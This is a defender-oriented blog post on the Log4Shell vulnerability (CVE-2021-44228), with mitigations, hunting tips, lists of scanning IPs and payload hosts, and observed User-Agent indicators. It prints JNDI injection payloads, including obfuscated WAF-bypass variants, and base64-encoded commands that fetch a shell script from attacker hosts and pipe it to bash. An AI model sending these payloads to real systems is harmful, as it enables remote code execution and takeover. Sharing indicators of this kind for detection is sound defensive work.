Log4j Hunting & Indicators

A summary of the long weekend experienced by thousands of security professionals.

By Joshua Beaman
Founder & Lead Trainer at SBT
Incident Responder at ASOS.com

The purpose of this page is to assist Defenders with the on-going global incident surrounding the Log4j no authentication remote code execution (RCE). This page contains the following sections:

Summary of Log4j or "Log4Shell", CVE-2021-44228

Click Here – National Vulnerability Database Link
Click Here – CVE Details Link
Click Here – Vendor (Apache) Advisory Link
Click Here – CISA Advisory Link
Click Here – NCSC Advisory Link

The Apache Software Foundation has released a security advisory to address a remote code execution vulnerability (CVE-2021-44228) affecting Log4j versions 2.0-beta9 to 2.14.1. A remote, unauthenticated attacker could exploit this vulnerability via a single request to take control of an affected system by executing code. Log4j is an open-source, Java-based logging utility widely used by enterprise applications and cloud services.

The Log4j 2 library is included in Apache frameworks such as:

  • Apache Struts2
  • Apache Solr
  • Apache Druid
  • Apache Flink
  • Apache Swift

If you are using the Log4j 2 library as a dependency within an application that has been developed in-house, ensure you update to version 2.15.0-rc-2 or later (NOT 2.15.0 as previously thought) to mitigate the vulnerability.

Communicating with third-parties/vendors to confirm their acknowledgement of CVE-2021-44228 and if they are affected, as well as patching timelines, will help with scoping the attack surface. If you are using an affected third-party application, ensure you keep the product updated to the latest version.

The flaw can also be mitigated in previous releases (2.10 and later) by setting system property “log4j2.formatMsgNoLookups” to “true” or removing the JndiLookup class from the classpath.

If a system is showing indicators of successful exploitation, standard digital forensics and incident response practices should be utilised to contain, analyse, and eradicate any malicious foothold.

Log4j Exploitation

I have primarily seen four approaches to execution, including the standard format. Real-world examples can be found in the User-Agent Indicators section.

  • Standard/Initial Format:
    ${jndi:ldap://IPAddress:Port/Basic/Command/Base64/EncodedCommandHere=}:
  • Lowercase/Uppercase Lookups:
    i-“${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}:”ii-“${${upper:j}ndi:${upper:l}${upper:d}a${a}a${lower:p}:”
  • Utilising System Environment Variables:
    “${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}” If there is no ENV_NAME system environment variable, use text after :-
  • ::- Notations:
    “${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}:”
Image credit: https://www.govcert.ch/blog/zero-day-exploit-targeting-popular-java-library-log4j/

Hunting Tips

  • FA quick win is to look for User-Agents that start with “${jndi” as this is a commonality we’ve seen across public and private reporting. This is shown in the User-Agent Indicators section of this page.
  • With the above, HTTP 200s could show successful exploitation activity (provided the end system is actually vulnerable). Other status codes such as 500, 404, etc could help you collect source IP indicators for blocking.
  • If you have access to dirty machines, when looking at requests that attempt to drop files onto the victim system, you can curl the payload URL. This can help with intelligence gathering such as file name, hash, size, and contents. Using yarGen to create YARA rules could be useful for further hunting to identify any occurrences of the file inside your environment.
  • Security Operations teams should be focusing harder than ever on SIEM/EDR/other alerts, as these could be indicators of actions-on-objectives as a result of successful log4j exploitation.
  • Contact 3rd-party services utilised by your organisation to understand if their products or services are affected by the vulnerability, and what their remediation timelines are. You can cross off services/products that aren’t affected or have been patched, and remove them from the scope.
  • Use the below list of Source IP Indicators to look for incoming traffic from scanning/exploitation IPs in your perimeter firewall, WAF, proxy, or system logs.
  • Use the below list of Payload Indicators to look for outbound connections to these IPs/domains in your perimeter firewall, EDR, proxy, or system logs.
  • Actors are finding new ways to obfuscate the standard “${jndi:ldap” string to bypass WAF rules. Review your logs to identify new variants being used, such as “${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}:” – naughty, right?
  • If your systems have Sysmon logging and you use Microsoft Defender, try out the Advanced Hunting queries provided in this article.
  • Use the following grep/zgrep commands by Florian Roth to hunt for exploitation activity in /var/log and sub-locations.
  • A vast amount of IOCs have been consolidated in one GitHub page here.
  • Snort and Suricata rules for Log4j can be downloaded here.

Source IP Indicators

The following source IPs are related to resources that are conducting log4j vulnerability identification scanning and exploitation. Different IPs may be used to host payloads or act as call-back servers to listen for vulnerable systems identified during reconnaissance. SBT cannot confirm the quality of these indicators, so do not block them outright, do your own reputation checks.

1.14.17.89
1.116.59.211
1.209.249.188
5.157.38.50
5.182.210.216
5.199.143.202
18.27.197.252
18.204.199.0
20.71.156.146
20.205.104.227
23.120.182.121
23.129.64.131
23.129.64.135
23.129.64.139
23.129.64.141
23.129.64.145
23.129.64.146
23.129.64.148
23.154.177.2
23.154.177.7
34.124.226.216
34.247.50.189
35.170.71.122
37.19.212.104
37.123.163.58
45.12.134.108
45.13.104.179
45.33.120.240
45.137.21.9
45.153.160.2
45.153.160.130
45.153.160.131
45.153.160.133
45.153.160.134
45.153.160.135
45.153.160.136
45.153.160.138
45.154.255.147
45.155.205.233
46.105.95.220
46.166.139.111
46.182.21.248
51.15.43.205
51.15.76.60
51.77.52.216
51.255.106.85
54.173.99.121
60.31.180.149
61.19.25.207
62.76.41.46
62.102.148.68
62.102.148.69
62.171.142.3
64.113.32.29
66.220.242.222
68.79.17.59
68.183.2.123
68.183.44.143
68.183.198.247
72.223.168.73
81.6.43.167
81.17.18.60
81.17.18.61
81.17.18.62
82.221.131.71
88.80.20.86
89.163.154.91
89.163.252.230
89.249.63.3
91.203.5.146
91.219.237.21
91.245.81.65
94.142.241.194
94.230.208.147
95.101.91.92
101.35.154.34
103.90.239.209
103.103.0.141
103.103.0.142
103.214.5.13
104.244.72.7
104.244.72.115
104.244.72.129
104.244.73.43
104.244.74.57
104.244.74.211
104.244.75.74
104.244.76.13
104.244.76.170
104.244.76.173
104.244.77.235
104.244.78.213
104.244.79.6
107.189.1.160
107.189.1.178
107.189.6.166
107.189.8.65
107.189.10.137
107.189.11.153
107.189.12.135
107.189.14.76
107.189.14.98
107.189.14.182
107.189.28.84
107.189.29.41
107.189.29.107
107.189.31.241
109.70.100.26
109.70.100.27
109.70.100.28
109.70.100.34
109.70.100.36
109.237.96.124
116.24.67.213
121.4.56.143
121.5.219.20
122.161.50.23
122.161.53.44
133.18.201.195
134.56.204.191
134.122.34.28
135.148.43.32
137.184.28.58
137.184.96.216
137.184.98.176
137.184.99.8
137.184.102.82
137.184.104.73
137.184.106.119
137.184.111.180
138.68.167.19
138.197.167.229
139.59.8.39
140.246.171.141
142.93.34.250
142.93.36.237
142.93.148.12
142.93.151.166
142.93.157.150
143.110.221.204
143.198.32.72
143.198.45.117
145.220.24.19
146.56.131.161
147.182.131.229
147.182.150.124
147.182.154.100
147.182.167.165
147.182.169.254
147.182.199.94
147.182.213.12
147.182.219.9
150.158.189.96
151.80.148.159
151.115.60.113
157.230.32.67
157.245.109.75
159.65.3.102
159.65.58.66
159.65.146.60
159.65.155.208
159.65.175.123
159.65.194.103
159.89.113.255
159.89.180.119
159.223.9.17
159.223.61.102
159.223.81.193
161.35.119.60
162.247.74.202
164.90.199.216
164.92.254.33
165.227.37.189
167.71.1.144
167.71.13.196
167.99.164.160
167.99.164.201
167.99.172.58
167.99.172.213
167.99.204.151
167.99.221.249
170.210.45.163
171.25.193.20
171.25.193.25
171.25.193.77
171.25.193.78
172.106.17.218
175.6.210.66
176.10.99.200
176.10.104.240
178.17.171.102
178.17.171.150
178.20.55.16
178.62.23.146
178.62.79.49
178.176.202.121
178.176.203.190
179.43.187.138
181.214.39.2
185.4.132.183
185.10.68.168
185.14.97.147
185.38.175.130
185.38.175.131
185.38.175.132
185.56.80.65
185.83.214.69
185.100.86.128
185.100.87.41
185.100.87.202
185.107.47.171
185.107.47.215
185.107.70.56
185.129.61.1
185.129.61.4
185.130.44.108
185.165.168.77
185.220.100.240
185.220.100.241
185.220.100.242
185.220.100.243
185.220.100.244
185.220.100.245
185.220.100.246
185.220.100.247
185.220.100.248
185.220.100.249
185.220.100.250
185.220.100.251
185.220.100.252
185.220.100.253
185.220.100.254
185.220.100.255
185.220.101.32
185.220.101.33
185.220.101.34
185.220.101.35
185.220.101.36
185.220.101.37
185.220.101.38
185.220.101.39
185.220.101.41
185.220.101.42
185.220.101.43
185.220.101.44
185.220.101.45
185.220.101.46
185.220.101.48
185.220.101.49
185.220.101.50
185.220.101.51
185.220.101.52
185.220.101.53
185.220.101.54
185.220.101.55
185.220.101.56
185.220.101.57
185.220.101.58
185.220.101.60
185.220.101.61
185.220.101.62
185.220.101.63
185.220.101.129
185.220.101.131
185.220.101.132
185.220.101.133
185.220.101.134
185.220.101.135
185.220.101.138
185.220.101.139
185.220.101.140
185.220.101.141
185.220.101.142
185.220.101.143
185.220.101.144
185.220.101.145
185.220.101.146
185.220.101.147
185.220.101.148
185.220.101.149
185.220.101.150
185.220.101.151
185.220.101.152
185.220.101.153
185.220.101.154
185.220.101.155
185.220.101.156
185.220.101.157
185.220.101.158
185.220.101.159
185.220.101.160
185.220.101.161
185.220.101.162
185.220.101.163
185.220.101.164
185.220.101.165
185.220.101.167
185.220.101.168
185.220.101.169
185.220.101.170
185.220.101.171
185.220.101.172
185.220.101.173
185.220.101.174
185.220.101.175
185.220.101.176
185.220.101.177
185.220.101.178
185.220.101.179
185.220.101.180
185.220.101.181
185.220.101.182
185.220.101.183
185.220.101.184
185.220.101.185
185.220.101.186
185.220.101.187
185.220.101.188
185.220.101.189
185.220.101.190
185.220.101.191
185.220.102.7
185.220.102.8
185.220.102.241
185.220.102.242
185.220.102.246
185.220.102.249
185.220.102.250
185.220.102.252
185.220.102.253
185.220.102.254
185.220.103.4
185.220.103.7
185.220.103.119
185.232.23.46
188.166.48.55
188.166.74.97
188.166.92.228
188.166.122.43
188.166.223.38
191.232.38.25
193.31.24.154
193.110.95.34
193.189.100.195
193.189.100.201
193.189.100.203
193.218.118.183
193.218.118.231
194.48.199.78
194.135.33.152
194.163.44.188
194.163.163.20
195.19.192.26
195.123.247.209
195.176.3.19
195.176.3.23
195.176.3.24
195.206.105.217
195.251.41.139
195.254.135.76
197.246.171.83
197.246.171.111
198.98.51.189
198.98.60.19
199.195.250.77
204.8.156.142
205.185.117.149
206.189.20.141
207.180.202.75
209.127.17.234
209.127.17.242
209.141.41.103
209.141.45.189
209.141.45.227
211.154.194.21
212.192.246.95
212.193.30.142
212.193.57.225
213.202.216.189
221.199.187.100

Payload Indicators

92.242.40[.]21:1534

SINKHOLE: http://kryptoslogic-cve-2021-44228[.]com

45.130.229[.]168:1389

92.242.40[.]21:5557

82.118.18[.]201:1534

dc13cc43.probe001.log4j.leakix[.]net:9200

c6qgldh5g22l07bu1lvgcg4uhtoy81emy.interactsh[.]com

45.155.205[.]233:12344

 

User-Agent Indicators

Please note that some indicators have been sanitised (using [.] on the last octet of IPs, or the TLD of domains) to prevent automatic hyperlinking. Ensure this is removed before running searches to retrieve accurate results.

${jndi:ldap://92.242.40[.]21:1534/Basic/Command/Base64/KGN1cmwgLXMgOTIuMjQyLjQwLjIxL2xoLnNofHx3Z2V0IC1xIC1PLSA5Mi4yNDIuNDAuMjEvbGguc2gpfGJhc2g=}

${jndi:${lower:l}${lower:d}a${lower:p}://sc${upper:a}n-one.research.billdemirkapi[.]me:1389/a}

${jndi:ldap://http443useragent.kryptoslogic-cve-2021-44228[.]com/http443useragent}

/${jndi:ldap://45.130.229[.]168:1389/Exploit}

${jndi:ldap://92.242.40[.]21:5557/Basic/Command/Base64/KGN1cmwgLXMgOTIuMjQyLjQwLjIxL2xoLnNofHx3Z2V0IC1xIC1PLSA5Mi4yNDIuNDAuMjEvbGguc2gpfGJhc2g=}

${jndi:ldap://82.118.18[.]201:1534/Basic/Command/Base64/KGN1cmwgLXMgODIuMTE4LjE4LjIwMS9saC5zaHx8d2dldCAtcSAtTy0gODIuMTE4LjE4LjIwMS9saC5zaCl8YmFzaA==}

${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j[.]bin${upper:a}ryedge[.]io:80/callback}

${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j[.]bin${upper:a}ryedge[.]io:80/callback}

${jndi:ldap://http80useragent.kryptoslogic-cve-2021-44228[.]com/http80useragent}

${jndi:ldaps://dc13cc43.probe001.log4j.leakix[.]net:9200/b}

${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.c6qgldh5g22l07bu1lvgcg4uhtoy81emy.interactsh[.]com}

${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.155.205[.]233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8yMC41NC45Ni4xNDc6NDQzfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0LzIwLjU0Ljk2LjE0Nzo0NDMpfGJhc2g=}

${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.155.205[.]233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8yMC41NC45Ni4xNTY6NDQzfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0LzIwLjU0Ljk2LjE1Njo0NDMpfGJhc2g=}

${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.155.205[.]233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xMy43NC4xOC44Mzo0NDN8fHdnZXQgLXEgLU8tIDQ1LjE1NS4yMDUuMjMzOjU4NzQvMTMuNzQuMTguODM6NDQzKXxiYXNo}

${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.155.205[.]233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8yMC41NC45Ni4xNTY6ODB8fHdnZXQgLXEgLU8tIDQ1LjE1NS4yMDUuMjMzOjU4NzQvMjAuNTQuOTYuMTU2OjgwKXxiYXNo}

${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.155.205[.]233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8yMC41NC45Ni4xNDc6ODB8fHdnZXQgLXEgLU8tIDQ1LjE1NS4yMDUuMjMzOjU4NzQvMjAuNTQuOTYuMTQ3OjgwKXxiYXNo}

${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.155.205[.]233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xMy43NC4xOC44Mzo4MHx8d2dldCAtcSAtTy0gNDUuMTU1LjIwNS4yMzM6NTg3NC8xMy43NC4xOC44Mzo4MCl8YmFzaA==}

Sources

Closing Note

If you enjoyed this post, please consider following me on LinkedIn. A big shout out to the security teams and incident responders around the world that have been dealing with this mess since Friday – good luck to you all.